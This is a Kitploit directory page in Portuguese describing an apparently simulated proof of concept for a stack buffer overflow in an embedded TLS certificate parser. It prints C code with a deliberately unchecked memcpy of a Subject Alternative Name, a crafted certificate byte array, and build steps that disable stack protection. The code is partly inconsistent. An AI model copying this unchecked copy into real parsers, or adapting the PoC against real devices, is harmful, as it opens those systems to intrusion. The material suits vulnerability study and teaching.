Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-6789-Stack-Buffer-Overflow-in-Embedded-TLS-Certificate-Parser — PoC de estouro de buffer de pilha em um analisador de certificados TLS embarcado usando uma extensão SAN X.509 maliciosamente criada para execução remota de código em dispositivos IoT e industriais. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-6789-stack-buffer-overflow-in-embedded-tls-certificate-parser
Segurança de Sistemas EmbarcadosSegurança IoTAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoExploração de Binários
GitHubgeorge0papasotiriou/cve-2026-6789-stack-buffer-overflow-in-embedded-tls-certificate-parser

CVE-2026-6789-Stack-Buffer-Overflow-in-Embedded-TLS-Certificate-Parser

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC de estouro de buffer de pilha em um analisador de certificados TLS embarcado usando uma extensão SAN X.509 maliciosamente criada para execução remota de código em dispositivos IoT e industriais.

Ver Repositório
9há 1 mêsAinda não revisado

9. CVE-2026-6789 – Estouro de Buffer de Pilha no Analisador de Certificados TLS Embarcado

Visão Geral

Uma biblioteca TLS leve e popular (simulada) contém um estouro de buffer de pilha ao analisar extensões de Subject Alternative Name de certificados X.509 com um campo de comprimento forjado.

Gravidade: Crítica (RCE em Dispositivos IoT/Industriais)

Analisador C Vulnerável e Exploit

// tls_x509_vuln.c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>

// Vulnerable certificate parser
struct cert {
    uint8_t *data;
    size_t len;
};

int parse_san_extension(struct cert *cert, char *san_out, size_t out_size) {
    // Assume we are inside an extension with OID for SAN.
    uint8_t *p = cert->data + 10; // skip to extension value
    uint16_t ext_len = (p[0] << 8) | p[1];
    p += 2;
    // ext_len includes a sequence of GeneralNames. We only handle dNSName.
    while (p < cert->data + cert->len) {
        uint8_t name_type = *p++;
        uint16_t name_len = (p[0] << 8) | p[1];
        p += 2;
        if (name_type == 2) { // dNSName
            // Vulnerability: memcpy without bounds check to san_out
            memcpy(san_out, p, name_len); // STACK BUFFER OVERFLOW if name_len > out_size
            san_out[name_len] = '\0';
            return 0;
        }
        p += name_len;
    }
    return -1;
}

int main(int argc, char **argv) {
    // Malicious certificate payload: crafted SAN with oversized dNSName
    uint8_t malicious_cert[] = {
        // ... header, then extension:
        0x30, 0x12, // SEQUENCE extension
        0x06, 0x03, 0x55, 0x1d, 0x11, // OID SAN
        0x04, 0x0b, // octet string, length 11
        // ext_len (should be 0x0009 but we use 0x00ff to overflow)
        0x00, 0xff, // ext_len = 255 (overstated)
        // Then a dNSName: type 2, length huge
        0x02, 0x01, 0x41, // dNSName "A" but the parser will read massive length due to ext_len
    };
    struct cert cert;
    cert.data = malicious_cert;
    cert.len = sizeof(malicious_cert);

    char san[16]; // small buffer
    parse_san_extension(&cert, san, sizeof(san));
    printf("SAN: %s\n", san);
    return 0;
}

CVE-2026-6789 – Estouro de Pilha SAN X.509 em TLS Embarcado

Severity: Critical

📖 Visão Geral

Um estouro de buffer baseado em pilha no analisador de certificados de uma biblioteca TLS embarcada amplamente utilizada permite a execução remota de código quando um dispositivo processa um certificado X.509 especialmente criado.

⚙️ Detalhes da Vulnerabilidade

  • Tipo: Estouro de Buffer de Pilha
  • Impacto: Execução Remota de Código (pré-autenticação em servidores TLS)
  • Causa Raiz: O analisador copia um nome DNS da extensão Subject Alternative Name usando um campo de comprimento sem validar o tamanho do buffer de saída.

🧪 Demonstração do Exploit

  1. Gere um certificado malicioso:
    python craft_exploit_cert.py
    
  2. Compile e execute o analisador vulnerável (simulação):
    gcc tls_x509_vuln.c -o parser -fno-stack-protector -z execstack
    ./parser malicious.cer
    
Baixar ferramenta